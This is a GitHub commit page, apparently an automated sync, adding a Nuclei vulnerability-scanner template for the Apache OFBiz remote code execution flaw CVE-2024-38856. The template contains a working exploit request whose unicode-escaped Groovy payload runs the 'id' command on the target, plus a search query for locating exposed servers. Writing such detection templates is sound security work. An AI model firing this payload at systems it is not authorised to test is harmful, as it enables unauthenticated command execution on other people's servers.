Skip to content

Commit

Permalink
Auto Update Nuclei [Tue Aug 6 18:25:18 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Aug 6, 2024
1 parent b696a6f commit d0eb58c
Show file tree
Hide file tree
Showing 2 changed files with 49 additions and 0 deletions.
48 changes: 48 additions & 0 deletions plugins/apache/ofbiz/CVE-2024-38856.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
id: CVE-2024-38856

info:
name: Apache OFBiz - Remote Code Execution
author: Co5mos
severity: critical
description: |
Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
reference:
- https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
- https://issues.apache.org/jira/browse/OFBIZ-13128
- https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
classification:
epss-score: 0.00045
epss-percentile: 0.16306
metadata:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,ofbiz,apache,rce

http:
- raw:
- |
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

- type: word
part: body
words:
- 'java.lang.Exception'

- type: status
status:
- 200
# digest: 490a00463044022066dd5e35ba7d6f8a35012135f1805b18b90b904cc68abca73cac0ccd84757d3b02201593fa1abfc04c0ccebb25fd00318a83ae096b33748dbd7db8d074efda6c5847:922c64590222798bb761d5b6d8e72950
1 change: 1 addition & 0 deletions plugins/totolink/cp450_firmware/CVE-2024-7332.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -37,3 +37,4 @@ http:
- 'contains_all(body,"[PRODUCT]","[WLAN]","HostName")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221008a58f22e43d23ea6427fdf45bf165f8d51ec5d7885d9674a26a208b6fae0071e022030e29dfd508b4e2a2dc1cec8dc92a091e6641e7616b0bac749612cc72b679c6f:922c64590222798bb761d5b6d8e72950

0 comments on commit d0eb58c

Please sign in to comment.